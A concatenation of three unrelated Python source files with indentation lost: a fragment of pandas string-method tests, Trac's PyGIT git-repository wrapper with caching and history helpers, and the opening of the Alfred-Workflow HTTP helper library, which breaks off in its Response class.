s = Series(["a,b", "c,d"], name="xxx", dtype=any_string_dtype)
result = s.str.partition(",")
expected = DataFrame(
{0: ["a", "c"], 1: [",", ","], 2: ["b", "d"]}, dtype=any_string_dtype
)
tm.assert_frame_equal(result, expected)
def test_partition_with_name_expand(any_string_dtype):
# GH 12617
# should preserve name
s = Series(["a,b", "c,d"], name="xxx", dtype=any_string_dtype)
result = s.str.partition(",", expand=False)
expected = Series([("a", ",", "b"), ("c", ",", "d")], name="xxx")
tm.assert_series_equal(result, expected)
def test_partition_index_with_name():
idx = Index(["a,b", "c,d"], name="xxx")
result = idx.str.partition(",")
expected = MultiIndex.from_tuples([("a", ",", "b"), ("c", ",", "d")])
assert result.nlevels == 3
tm.assert_index_equal(result, expected)
def test_partition_index_with_name_expand_false():
idx = Index(["a,b", "c,d"], name="xxx")
# should preserve name
result = idx.str.partition(",", expand=False)
expected = Index(np.array([("a", ",", "b"), ("c", ",", "d")]), name="xxx")
assert result.nlevels == 1
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize("method", ["partition", "rpartition"])
def test_partition_sep_kwarg(any_string_dtype, method):
# GH 22676; depr kwarg "pat" in favor of "sep"
s = Series(["a_b_c", "c_d_e", np.nan, "f_g_h"], dtype=any_string_dtype)
expected = getattr(s.str, method)(sep="_")
result = getattr(s.str, method)("_")
tm.assert_frame_equal(result, expected)
def test_get():
ser = Series(["a_b_c", "c_d_e", np.nan, "f_g_h"])
result = ser.str.split("_").str.get(1)
expected = Series(["b", "d", np.nan, "g"])
tm.assert_series_equal(result, expected)
def test_get_mixed_object():
ser = Series(["a_b_c", np.nan, "c_d_e", True, datetime.today(), None, 1, 2.0])
result = ser.str.split("_").str.get(1)
expected = Series(["b", np.nan, "d", np.nan, np.nan, np.nan, np.nan, np.nan])
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("idx", [2, -3])
def test_get_bounds(idx):
ser = Series(["1_2_3_4_5", "6_7_8_9_10", "11_12"])
result = ser.str.split("_").str.get(idx)
expected = Series(["3", "8", np.nan])
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"idx, exp", [[2, [3, 3, np.nan, "b"]], [-1, [3, 3, np.nan, np.nan]]]
)
def test_get_complex(idx, exp):
# GH 20671, getting value not in dict raising `KeyError`
ser = Series([(1, 2, 3), [1, 2, 3], {1, 2, 3}, {1: "a", 2: "b", 3: "c"}])
result = ser.str.get(idx)
expected = Series(exp)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("to_type", [tuple, list, np.array])
def test_get_complex_nested(to_type):
ser = Series([to_type([to_type([1, 2])])])
result = ser.str.get(0)
expected = Series([to_type([1, 2])])
tm.assert_series_equal(result, expected)
result = ser.str.get(1)
expected = Series([np.nan])
tm.assert_series_equal(result, expected)
def test_get_strings(any_string_dtype):
ser = Series(["a", "ab", np.nan, "abc"], dtype=any_string_dtype)
result = ser.str.get(2)
expected = Series([np.nan, np.nan, np.nan, "c"], dtype=any_string_dtype)
tm.assert_series_equal(result, expected)
|
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012 Edgewall Software
# Copyright (C) 2006-2011, Herbert Valerio Riedel <hvr@gnu.org>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
from __future__ import with_statement
import os
import codecs
from collections import deque
from contextlib import contextmanager
import cStringIO
from functools import partial
from operator import itemgetter
import re
from subprocess import Popen, PIPE
import sys
from threading import Lock
import time
import weakref
__all__ = ['GitError', 'GitErrorSha', 'Storage', 'StorageFactory']
def terminate(process):
"""Python 2.5 compatibility method.
os.kill is not available on Windows before Python 2.7.
In Python 2.6 subprocess.Popen has a terminate method.
(It also seems to have some issues on Windows though.)
"""
def terminate_win(process):
import ctypes
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE,
False,
process.pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
def terminate_nix(process):
import os
import signal
return os.kill(process.pid, signal.SIGTERM)
if sys.platform == 'win32':
return terminate_win(process)
return terminate_nix(process)
class GitError(Exception):
pass
class GitErrorSha(GitError):
pass
# Helper functions
def parse_commit(raw):
"""Parse the raw content of a commit (as given by `git cat-file -p <rev>`).
Return the commit message and a dict of properties.
"""
if not raw:
raise GitErrorSha
lines = raw.splitlines()
if not lines:
raise GitErrorSha
line = lines.pop(0)
props = {}
multiline = multiline_key = None
while line:
if line[0] == ' ':
if not multiline:
multiline_key = key
multiline = [props[multiline_key][-1]]
multiline.append(line[1:])
else:
key, value = line.split(None, 1)
props.setdefault(key, []).append(value.strip())
line = lines.pop(0)
if multiline and (not line or key != multiline_key):
props[multiline_key][-1] = '\n'.join(multiline)
multiline = None
return '\n'.join(lines), props
class GitCore(object):
"""Low-level wrapper around git executable"""
def __init__(self, git_dir=None, git_bin='git'):
self.__git_bin = git_bin
self.__git_dir = git_dir
def __repr__(self):
return '<GitCore bin="%s" dir="%s">' % (self.__git_bin,
self.__git_dir)
def __build_git_cmd(self, gitcmd, *args):
"""construct command tuple for git call suitable for Popen()"""
cmd = [self.__git_bin]
if self.__git_dir:
cmd.append('--git-dir=%s' % self.__git_dir)
cmd.append(gitcmd)
cmd.extend(args)
return cmd
def __pipe(self, git_cmd, *cmd_args, **kw):
if sys.platform == 'win32':
return Popen(self.__build_git_cmd(git_cmd, *cmd_args), **kw)
else:
return Popen(self.__build_git_cmd(git_cmd, *cmd_args),
close_fds=True, **kw)
def __execute(self, git_cmd, *cmd_args):
"""execute git command and return file-like object of stdout"""
#print >>sys.stderr, "DEBUG:", git_cmd, cmd_args
p = self.__pipe(git_cmd, stdout=PIPE, stderr=PIPE, *cmd_args)
stdout_data, stderr_data = p.communicate()
#TODO, do something with p.returncode, e.g. raise exception
return stdout_data
def cat_file_batch(self):
return self.__pipe('cat-file', '--batch', stdin=PIPE, stdout=PIPE)
def log_pipe(self, *cmd_args):
return self.__pipe('log', stdout=PIPE, *cmd_args)
def __getattr__(self, name):
if name[0] == '_' or name in ['cat_file_batch', 'log_pipe']:
raise AttributeError, name
return partial(self.__execute, name.replace('_','-'))
__is_sha_pat = re.compile(r'[0-9A-Fa-f]*$')
@classmethod
def is_sha(cls, sha):
"""returns whether sha is a potential sha id
(i.e. proper hexstring between 4 and 40 characters)
"""
# quick test before starting up regexp matcher
if not (4 <= len(sha) <= 40):
return False
return bool(cls.__is_sha_pat.match(sha))
class SizedDict(dict):
"""Size-bounded dictionary with FIFO replacement strategy"""
def __init__(self, max_size=0):
dict.__init__(self)
self.__max_size = max_size
self.__key_fifo = deque()
self.__lock = Lock()
def __setitem__(self, name, value):
with self.__lock:
assert len(self) == len(self.__key_fifo) # invariant
if not self.__contains__(name):
self.__key_fifo.append(name)
rc = dict.__setitem__(self, name, value)
while len(self.__key_fifo) > self.__max_size:
self.__delitem__(self.__key_fifo.popleft())
assert len(self) == len(self.__key_fifo) # invariant
return rc
def setdefault(self, *_):
raise NotImplemented("SizedDict has no setdefault() method")
class StorageFactory(object):
__dict = weakref.WeakValueDictionary()
__dict_nonweak = dict()
__dict_lock = Lock()
def __init__(self, repo, log, weak=True, git_bin='git',
git_fs_encoding=None):
self.logger = log
with StorageFactory.__dict_lock:
try:
i = StorageFactory.__dict[repo]
except KeyError:
i = Storage(repo, log, git_bin, git_fs_encoding)
StorageFactory.__dict[repo] = i
# create or remove additional reference depending on 'weak'
# argument
if weak:
try:
del StorageFactory.__dict_nonweak[repo]
except KeyError:
pass
else:
StorageFactory.__dict_nonweak[repo] = i
self.__inst = i
self.__repo = repo
def getInstance(self):
is_weak = self.__repo not in StorageFactory.__dict_nonweak
self.logger.debug("requested %sPyGIT.Storage instance %d for '%s'"
% (("","weak ")[is_weak], id(self.__inst),
self.__repo))
return self.__inst
class Storage(object):
"""High-level wrapper around GitCore with in-memory caching"""
__SREV_MIN = 4 # minimum short-rev length
class RevCache(tuple):
"""RevCache(youngest_rev, oldest_rev, rev_dict, tag_set, srev_dict,
branch_dict)
In Python 2.7 this class could be defined by:
from collections import namedtuple
RevCache = namedtuple('RevCache', 'youngest_rev oldest_rev '
'rev_dict tag_set srev_dict '
'branch_dict')
This implementation is what that code generator would produce.
"""
__slots__ = ()
_fields = ('youngest_rev', 'oldest_rev', 'rev_dict', 'tag_set',
'srev_dict', 'branch_dict')
def __new__(cls, youngest_rev, oldest_rev, rev_dict, tag_set,
srev_dict, branch_dict):
return tuple.__new__(cls, (youngest_rev, oldest_rev, rev_dict,
tag_set, srev_dict, branch_dict))
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
"""Make a new RevCache object from a sequence or iterable"""
result = new(cls, iterable)
if len(result) != 6:
raise TypeError('Expected 6 arguments, got %d' % len(result))
return result
def __repr__(self):
return 'RevCache(youngest_rev=%r, oldest_rev=%r, rev_dict=%r, ' \
'tag_set=%r, srev_dict=%r, branch_dict=%r)' % self
def _asdict(t):
"""Return a new dict which maps field names to their values"""
return {'youngest_rev': t[0], 'oldest_rev': t[1],
'rev_dict': t[2], 'tag_set': t[3], 'srev_dict': t[4],
'branch_dict': t[5]}
def _replace(self, **kwds):
"""Return a new RevCache object replacing specified fields with
new values
"""
result = self._make(map(kwds.pop, ('youngest_rev', 'oldest_rev',
'rev_dict', 'tag_set', 'srev_dict', 'branch_dict'), self))
if kwds:
raise ValueError("Got unexpected field names: %r"
% kwds.keys())
return result
def __getnewargs__(self):
return tuple(self)
youngest_rev = property(itemgetter(0))
oldest_rev = property(itemgetter(1))
rev_dict = property(itemgetter(2))
tag_set = property(itemgetter(3))
srev_dict = property(itemgetter(4))
branch_dict = property(itemgetter(5))
@staticmethod
def __rev_key(rev):
assert len(rev) >= 4
#assert GitCore.is_sha(rev)
srev_key = int(rev[:4], 16)
assert srev_key >= 0 and srev_key <= 0xffff
return srev_key
@staticmethod
def git_version(git_bin='git'):
GIT_VERSION_MIN_REQUIRED = (1, 5, 6)
try:
g = GitCore(git_bin=git_bin)
[v] = g.version().splitlines()
version = v.strip().split()[2]
# 'version' has usually at least 3 numeric version
# components, e.g.::
# 1.5.4.2
# 1.5.4.3.230.g2db511
# 1.5.4.GIT
def try_int(s):
try:
return int(s)
except ValueError:
return s
split_version = tuple(map(try_int, version.split('.')))
result = {}
result['v_str'] = version
result['v_tuple'] = split_version
result['v_min_tuple'] = GIT_VERSION_MIN_REQUIRED
result['v_min_str'] = ".".join(map(str, GIT_VERSION_MIN_REQUIRED))
result['v_compatible'] = split_version >= GIT_VERSION_MIN_REQUIRED
return result
except Exception, e:
raise GitError("Could not retrieve GIT version (tried to "
"execute/parse '%s --version' but got %s)"
% (git_bin, repr(e)))
def __init__(self, git_dir, log, git_bin='git', git_fs_encoding=None):
"""Initialize PyGit.Storage instance
`git_dir`: path to .git folder;
this setting is not affected by the `git_fs_encoding` setting
`log`: logger instance
`git_bin`: path to executable
this setting is not affected by the `git_fs_encoding` setting
`git_fs_encoding`: encoding used for paths stored in git repository;
if `None`, no implicit decoding/encoding to/from
unicode objects is performed, and bytestrings are
returned instead
"""
self.logger = log
self.commit_encoding = None
# caches
self.__rev_cache = None
self.__rev_cache_lock = Lock()
# cache the last 200 commit messages
self.__commit_msg_cache = SizedDict(200)
self.__commit_msg_lock = Lock()
self.__cat_file_pipe = None
self.__cat_file_pipe_lock = Lock()
if git_fs_encoding is not None:
# validate encoding name
codecs.lookup(git_fs_encoding)
# setup conversion functions
self._fs_to_unicode = lambda s: s.decode(git_fs_encoding)
self._fs_from_unicode = lambda s: s.encode(git_fs_encoding)
else:
# pass bytestrings as-is w/o any conversion
self._fs_to_unicode = self._fs_from_unicode = lambda s: s
# simple sanity checking
__git_file_path = partial(os.path.join, git_dir)
if not all(map(os.path.exists,
map(__git_file_path,
['HEAD','objects','refs']))):
self.logger.error("GIT control files missing in '%s'" % git_dir)
if os.path.exists(__git_file_path('.git')):
self.logger.error("entry '.git' found in '%s'"
" -- maybe use that folder instead..."
% git_dir)
raise GitError("GIT control files not found, maybe wrong "
"directory?")
self.repo = GitCore(git_dir, git_bin=git_bin)
self.logger.debug("PyGIT.Storage instance %d constructed" % id(self))
def __del__(self):
with self.__cat_file_pipe_lock:
if self.__cat_file_pipe is not None:
self.__cat_file_pipe.stdin.close()
terminate(self.__cat_file_pipe)
self.__cat_file_pipe.wait()
#
# cache handling
#
# called by Storage.sync()
def __rev_cache_sync(self, youngest_rev=None):
"""invalidates revision db cache if necessary"""
with self.__rev_cache_lock:
need_update = False
if self.__rev_cache:
last_youngest_rev = self.__rev_cache.youngest_rev
if last_youngest_rev != youngest_rev:
self.logger.debug("invalidated caches (%s != %s)"
% (last_youngest_rev, youngest_rev))
need_update = True
else:
need_update = True # almost NOOP
if need_update:
self.__rev_cache = None
return need_update
def get_rev_cache(self):
"""Retrieve revision cache
may rebuild cache on the fly if required
returns RevCache tuple
"""
with self.__rev_cache_lock:
if self.__rev_cache is None:
# can be cleared by Storage.__rev_cache_sync()
self.logger.debug("triggered rebuild of commit tree db "
"for %d" % id(self))
ts0 = time.time()
youngest = None
oldest = None
new_db = {} # db
new_sdb = {} # short_rev db
# helper for reusing strings
__rev_seen = {}
def __rev_reuse(rev):
rev = str(rev)
return __rev_seen.setdefault(rev, rev)
new_tags = set(__rev_reuse(rev.strip())
for rev in self.repo.rev_parse('--tags')
.splitlines())
new_branches = [(k, __rev_reuse(v))
for k, v in self._get_branches()]
head_revs = set(v for _, v in new_branches)
rev = ord_rev = 0
for ord_rev, revs in enumerate(
self.repo.rev_list('--parents',
'--topo-order',
'--all')
.splitlines()):
revs = map(__rev_reuse, revs.strip().split())
rev = revs[0]
# first rev seen is assumed to be the youngest one
if not ord_rev:
youngest = rev
# shortrev "hash" map
srev_key = self.__rev_key(rev)
new_sdb.setdefault(srev_key, []).append(rev)
# parents
parents = tuple(revs[1:])
# new_db[rev] = (children(rev), parents(rev),
# ordinal_id(rev), rheads(rev))
if rev in new_db:
# (incomplete) entry was already created by children
_children, _parents, _ord_rev, _rheads = new_db[rev]
assert _children
assert not _parents
assert _ord_rev == 0
if rev in head_revs and rev not in _rheads:
_rheads.append(rev)
else: # new entry
_children = []
_rheads = [rev] if rev in head_revs else []
# create/update entry
# transform lists into tuples since entry will be final
new_db[rev] = tuple(_children), tuple(parents), \
ord_rev + 1, tuple(_rheads)
# update parents(rev)s
for parent in parents:
# by default, a dummy ordinal_id is used
# for the mean-time
_children, _parents, _ord_rev, _rheads2 = \
new_db.setdefault(parent, ([], [], 0, []))
# update parent(rev)'s children
if rev not in _children:
_children.append(rev)
# update parent(rev)'s rheads
for rev in _rheads:
if rev not in _rheads2:
_rheads2.append(rev)
# last rev seen is assumed to be the oldest
# one (with highest ord_rev)
oldest = rev
__rev_seen = None
# convert sdb either to dict or array depending on size
tmp = [()]*(max(new_sdb.keys())+1) \
if len(new_sdb) > 5000 else {}
try:
while True:
k, v = new_sdb.popitem()
tmp[k] = tuple(v)
except KeyError:
pass
assert len(new_sdb) == 0
new_sdb = tmp
# atomically update self.__rev_cache
self.__rev_cache = Storage.RevCache(youngest, oldest, new_db,
new_tags, new_sdb,
new_branches)
ts1 = time.time()
self.logger.debug("rebuilt commit tree db for %d with %d "
"entries (took %.1f ms)"
% (id(self), len(new_db), 1000*(ts1-ts0)))
assert all(e is not None for e in self.__rev_cache) \
or not any(self.__rev_cache)
return self.__rev_cache
# with self.__rev_cache_lock
# see RevCache namedtuple
rev_cache = property(get_rev_cache)
def _get_branches(self):
"""returns list of (local) branches, with active (= HEAD) one being
the first item
"""
result = []
for e in self.repo.branch('-v', '--no-abbrev').splitlines():
bname, bsha = e[1:].strip().split()[:2]
if e.startswith('*'):
result.insert(0, (bname, bsha))
else:
result.append((bname, bsha))
return result
def get_branches(self):
"""returns list of (local) branches, with active (= HEAD) one being
the first item
"""
return ((self._fs_to_unicode(name), sha)
for name, sha in self.rev_cache.branch_dict)
def get_commits(self):
return self.rev_cache.rev_dict
def oldest_rev(self):
return self.rev_cache.oldest_rev
def youngest_rev(self):
return self.rev_cache.youngest_rev
def get_branch_contains(self, sha, resolve=False):
"""return list of reachable head sha ids or (names, sha) pairs if
resolve is true
see also get_branches()
"""
_rev_cache = self.rev_cache
try:
rheads = _rev_cache.rev_dict[sha][3]
except KeyError:
return []
if resolve:
return ((self._fs_to_unicode(k), v)
for k, v in _rev_cache.branch_dict if v in rheads)
return rheads
def history_relative_rev(self, sha, rel_pos):
db = self.get_commits()
if sha not in db:
raise GitErrorSha()
if rel_pos == 0:
return sha
lin_rev = db[sha][2] + rel_pos
if lin_rev < 1 or lin_rev > len(db):
return None
for k, v in db.iteritems():
if v[2] == lin_rev:
return k
# should never be reached if db is consistent
raise GitError("internal inconsistency detected")
def hist_next_revision(self, sha):
return self.history_relative_rev(sha, -1)
def hist_prev_revision(self, sha):
return self.history_relative_rev(sha, +1)
def get_commit_encoding(self):
if self.commit_encoding is None:
self.commit_encoding = \
self.repo.repo_config("--get", "i18n.commitEncoding") \
.strip() or 'utf-8'
return self.commit_encoding
def head(self):
"""get current HEAD commit id"""
return self.verifyrev('HEAD')
def cat_file(self, kind, sha):
with self.__cat_file_pipe_lock:
if self.__cat_file_pipe is None:
self.__cat_file_pipe = self.repo.cat_file_batch()
try:
self.__cat_file_pipe.stdin.write(sha + '\n')
self.__cat_file_pipe.stdin.flush()
split_stdout_line = self.__cat_file_pipe.stdout.readline() \
.split()
if len(split_stdout_line) != 3:
raise GitError("internal error (could not split line "
"'%s')" % (split_stdout_line,))
_sha, _type, _size = split_stdout_line
if _type != kind:
raise GitError("internal error (got unexpected object "
"kind '%s', expected '%s')"
% (_type, kind))
size = int(_size)
return self.__cat_file_pipe.stdout.read(size + 1)[:size]
except:
# There was an error, we should close the pipe to get to a
# consistent state (Otherwise it happens that next time we
# call cat_file we get payload from previous call)
self.logger.debug("closing cat_file pipe")
self.__cat_file_pipe.stdin.close()
terminate(self.__cat_file_pipe)
self.__cat_file_pipe.wait()
self.__cat_file_pipe = None
def verifyrev(self, rev):
"""verify/lookup given revision object and return a sha id or None
if lookup failed
"""
rev = self._fs_from_unicode(rev)
_rev_cache = self.rev_cache
if GitCore.is_sha(rev):
# maybe it's a short or full rev
fullrev = self.fullrev(rev)
if fullrev:
return fullrev
# fall back to external git calls
rc = self.repo.rev_parse('--verify', rev).strip()
if not rc:
return None
if rc in _rev_cache.rev_dict:
return rc
if rc in _rev_cache.tag_set:
sha = self.cat_file('tag', rc).split(None, 2)[:2]
if sha[0] != 'object':
self.logger.debug("unexpected result from 'git-cat-file tag "
"%s'" % rc)
return None
return sha[1]
return None
def shortrev(self, rev, min_len=7):
"""try to shorten sha id"""
#try to emulate the following:
#return self.repo.rev_parse("--short", str(rev)).strip()
rev = str(rev)
if min_len < self.__SREV_MIN:
min_len = self.__SREV_MIN
_rev_cache = self.rev_cache
if rev not in _rev_cache.rev_dict:
return None
srev = rev[:min_len]
srevs = set(_rev_cache.srev_dict[self.__rev_key(rev)])
if len(srevs) == 1:
return srev # we already got a unique id
# find a shortened id for which rev doesn't conflict with
# the other ones from srevs
crevs = srevs - set([rev])
for l in range(min_len+1, 40):
srev = rev[:l]
if srev not in [ r[:l] for r in crevs ]:
return srev
return rev # worst-case, all except the last character match
def fullrev(self, srev):
"""try to reverse shortrev()"""
srev = str(srev)
_rev_cache = self.rev_cache
# short-cut
if len(srev) == 40 and srev in _rev_cache.rev_dict:
return srev
if not GitCore.is_sha(srev):
return None
try:
srevs = _rev_cache.srev_dict[self.__rev_key(srev)]
except KeyError:
return None
srevs = filter(lambda s: s.startswith(srev), srevs)
if len(srevs) == 1:
return srevs[0]
return None
def get_tags(self):
return (self._fs_to_unicode(e.strip())
for e in self.repo.tag('-l').splitlines())
def ls_tree(self, rev, path=''):
rev = rev and str(rev) or 'HEAD' # paranoia
path = self._fs_from_unicode(path)
if path.startswith('/'):
path = path[1:]
tree = self.repo.ls_tree('-z', '-l', rev, '--', path).split('\0')
def split_ls_tree_line(l):
"""split according to '<mode> <type> <sha> <size>\t<fname>'"""
meta, fname = l.split('\t', 1)
_mode, _type, _sha, _size = meta.split()
if _size == '-':
_size = None
else:
_size = int(_size)
return _mode, _type, _sha, _size, self._fs_to_unicode(fname)
return [ split_ls_tree_line(e) for e in tree if e ]
def read_commit(self, commit_id):
if not commit_id:
raise GitError("read_commit called with empty commit_id")
commit_id, commit_id_orig = self.fullrev(commit_id), commit_id
db = self.get_commits()
if commit_id not in db:
self.logger.info("read_commit failed for '%s' ('%s')" %
(commit_id, commit_id_orig))
raise GitErrorSha
with self.__commit_msg_lock:
if self.__commit_msg_cache.has_key(commit_id):
# cache hit
result = self.__commit_msg_cache[commit_id]
return result[0], dict(result[1])
# cache miss
raw = self.cat_file('commit', commit_id)
raw = unicode(raw, self.get_commit_encoding(), 'replace')
result = parse_commit(raw)
self.__commit_msg_cache[commit_id] = result
return result[0], dict(result[1])
def get_file(self, sha):
return cStringIO.StringIO(self.cat_file('blob', str(sha)))
def get_obj_size(self, sha):
sha = str(sha)
try:
obj_size = int(self.repo.cat_file('-s', sha).strip())
except ValueError:
raise GitErrorSha("object '%s' not found" % sha)
return obj_size
def children(self, sha):
db = self.get_commits()
try:
return list(db[sha][0])
except KeyError:
return []
def children_recursive(self, sha, rev_dict=None):
"""Recursively traverse children in breadth-first order"""
if rev_dict is None:
rev_dict = self.get_commits()
work_list = deque()
seen = set()
seen.update(rev_dict[sha][0])
work_list.extend(rev_dict[sha][0])
while work_list:
p = work_list.popleft()
yield p
_children = set(rev_dict[p][0]) - seen
seen.update(_children)
work_list.extend(_children)
assert len(work_list) == 0
def parents(self, sha):
db = self.get_commits()
try:
return list(db[sha][1])
except KeyError:
return []
def all_revs(self):
return self.get_commits().iterkeys()
def sync(self):
rev = self.repo.rev_list('--max-count=1', '--topo-order', '--all') \
.strip()
return self.__rev_cache_sync(rev)
@contextmanager
def get_historian(self, sha, base_path):
p = []
change = {}
next_path = []
def name_status_gen():
p[:] = [self.repo.log_pipe('--pretty=format:%n%H',
'--name-status', sha, '--', base_path)]
f = p[0].stdout
for l in f:
if l == '\n':
continue
old_sha = l.rstrip('\n')
for l in f:
if l == '\n':
break
_, path = l.rstrip('\n').split('\t', 1)
while path not in change:
change[path] = old_sha
if next_path == [path]:
yield old_sha
try:
path, _ = path.rsplit('/', 1)
except ValueError:
break
f.close()
terminate(p[0])
p[0].wait()
p[:] = []
while True:
yield None
gen = name_status_gen()
def historian(path):
try:
return change[path]
except KeyError:
next_path[:] = [path]
return gen.next()
yield historian
if p:
p[0].stdout.close()
terminate(p[0])
p[0].wait()
def last_change(self, sha, path, historian=None):
if historian is not None:
return historian(path)
return self.repo.rev_list('--max-count=1',
sha, '--',
self._fs_from_unicode(path)).strip() or None
def history(self, sha, path, limit=None):
if limit is None:
limit = -1
tmp = self.repo.rev_list('--max-count=%d' % limit, str(sha), '--',
self._fs_from_unicode(path))
return [ rev.strip() for rev in tmp.splitlines() ]
def history_timerange(self, start, stop):
return [ rev.strip() for rev in \
self.repo.rev_list('--reverse',
'--max-age=%d' % start,
'--min-age=%d' % stop,
'--all').splitlines() ]
def rev_is_anchestor_of(self, rev1, rev2):
"""return True if rev2 is successor of rev1"""
rev1 = rev1.strip()
rev2 = rev2.strip()
rev_dict = self.get_commits()
return (rev2 in rev_dict and
rev2 in self.children_recursive(rev1, rev_dict))
def blame(self, commit_sha, path):
in_metadata = False
path = self._fs_from_unicode(path)
for line in self.repo.blame('-p', '--', path, str(commit_sha)) \
.splitlines():
assert line
if in_metadata:
in_metadata = not line.startswith('\t')
else:
split_line = line.split()
if len(split_line) == 4:
(sha, orig_lineno, lineno, group_size) = split_line
else:
(sha, orig_lineno, lineno) = split_line
assert len(sha) == 40
yield (sha, lineno)
in_metadata = True
assert not in_metadata
def diff_tree(self, tree1, tree2, path='', find_renames=False):
"""calls `git diff-tree` and returns tuples of the kind
(mode1,mode2,obj1,obj2,action,path1,path2)"""
# diff-tree returns records with the following structure:
# :<old-mode> <new-mode> <old-sha> <new-sha> <change> NUL <old-path> NUL [ <new-path> NUL ]
path = self._fs_from_unicode(path).strip('/')
diff_tree_args = ['-z', '-r']
if find_renames:
diff_tree_args.append('-M')
diff_tree_args.extend([str(tree1) if tree1 else '--root',
str(tree2),
'--', path])
lines = self.repo.diff_tree(*diff_tree_args).split('\0')
assert lines[-1] == ''
del lines[-1]
if tree1 is None and lines:
# if only one tree-sha is given on commandline,
# the first line is just the redundant tree-sha itself...
assert not lines[0].startswith(':')
del lines[0]
# FIXME: the following code is ugly, needs rewrite
chg = None
def __chg_tuple():
if len(chg) == 6:
chg.append(None)
else:
chg[6] = self._fs_to_unicode(chg[6])
chg[5] = self._fs_to_unicode(chg[5])
assert len(chg) == 7
return tuple(chg)
for line in lines:
if line.startswith(':'):
if chg:
yield __chg_tuple()
chg = line[1:].split()
assert len(chg) == 5
else:
chg.append(line)
# handle left-over chg entry
if chg:
yield __chg_tuple()
|
|
# encoding: utf-8
#
# Copyright (c) 2014 Dean Jackson <deanishe@deanishe.net>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2014-02-15
#
"""
A lightweight HTTP library with a requests-like interface.
"""
from __future__ import print_function
import codecs
import json
import mimetypes
import os
import random
import re
import socket
import string
import unicodedata
import urllib
import urllib2
import urlparse
import zlib
USER_AGENT = u'Alfred-Workflow/1.11 (http://www.deanishe.net)'
# Valid characters for multipart form data boundaries
BOUNDARY_CHARS = string.digits + string.ascii_letters
# HTTP response codes
RESPONSES = {
100: 'Continue',
101: 'Switching Protocols',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non-Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required',
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request-URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported'
}
def str_dict(dic):
"""Convert keys and values in ``dic`` into UTF-8-encoded :class:`str`
:param dic: :class:`dict` of Unicode strings
:returns: :class:`dict`
"""
if isinstance(dic, CaseInsensitiveDictionary):
dic2 = CaseInsensitiveDictionary()
else:
dic2 = {}
for k, v in dic.items():
if isinstance(k, unicode):
k = k.encode('utf-8')
if isinstance(v, unicode):
v = v.encode('utf-8')
dic2[k] = v
return dic2
class NoRedirectHandler(urllib2.HTTPRedirectHandler):
"""Prevent redirections"""
def redirect_request(self, *args):
return None
# Adapted from https://gist.github.com/babakness/3901174
class CaseInsensitiveDictionary(dict):
"""
Dictionary that enables case insensitive searching while preserving
case sensitivity when keys are listed, ie, via keys() or items() methods.
Works by storing a lowercase version of the key as the new key and
stores the original key-value pair as the key's value
(values become dictionaries).
"""
def __init__(self, initval=None):
if isinstance(initval, dict):
for key, value in initval.iteritems():
self.__setitem__(key, value)
elif isinstance(initval, list):
for (key, value) in initval:
self.__setitem__(key, value)
def __contains__(self, key):
return dict.__contains__(self, key.lower())
def __getitem__(self, key):
return dict.__getitem__(self, key.lower())['val']
def __setitem__(self, key, value):
return dict.__setitem__(self, key.lower(), {'key': key, 'val': value})
def get(self, key, default=None):
try:
v = dict.__getitem__(self, key.lower())
except KeyError:
return default
else:
return v['val']
def update(self, other):
for k, v in other.items():
self[k] = v
def items(self):
return [(v['key'], v['val']) for v in dict.itervalues(self)]
def keys(self):
return [v['key'] for v in dict.itervalues(self)]
def values(self):
return [v['val'] for v in dict.itervalues(self)]
def iteritems(self):
for v in dict.itervalues(self):
yield v['key'], v['val']
def iterkeys(self):
for v in dict.itervalues(self):
yield v['key']
def itervalues(self):
for v in dict.itervalues(self):
yield v['val']
class Response(object):
"""
Returned by :func:`request` / :func:`get` / :func:`post` functions.
A simplified version of the ``Response`` object in the ``requests`` library.
>>> r = request('http://www.google.com')
>>> r.status_code
200
>>> r.encoding
ISO-8859-1
>>> r.content # bytes
<html> ...
>>> r.text # unicode, decoded according to charset in HTTP header/meta tag
u'<html> ...'
>>> r.json() # content parsed as JSON
"""
def __init__(self, request):
"""Call `request` with :mod:`urllib2` and process results.
:param request: :class:`urllib2.Request` instance
"""
self.request = request
self.url = None
self.raw = None
self._encoding = None
self.error = None
self.status_code = None
self.reason = None
self.headers = CaseInsensitiveDictionary()
self._content = None
self._gzipped = False
# Execute query
try:
self.raw = urllib2.urlopen(request)
except urllib2.HTTPError as err:
self.error = err
try:
self.url = err.geturl()
# sometimes (e.g. when authentication fails)
# urllib can't get a URL from an HTTPError
# This behaviour changes across Python versions,
# so no test cover (it isn't important).
except AttributeError: # pragma: no cover
pass
self.status_code = err.code
else:
self.status_code = self.raw.getcode()
self.url = self.raw.geturl()
self.reason = RESPONSES.get(self.status_code)
# Parse additional info if request succeeded
if not self.error:
headers = self.raw.info()
self.transfer_encoding = headers.getencoding()
self.mimetype = headers.gettype()
for key in headers.keys():
self.headers[key.lower()] = headers.get(key)
# Is content gzipped?
# Transfer-Encoding appears to not be used in the wild
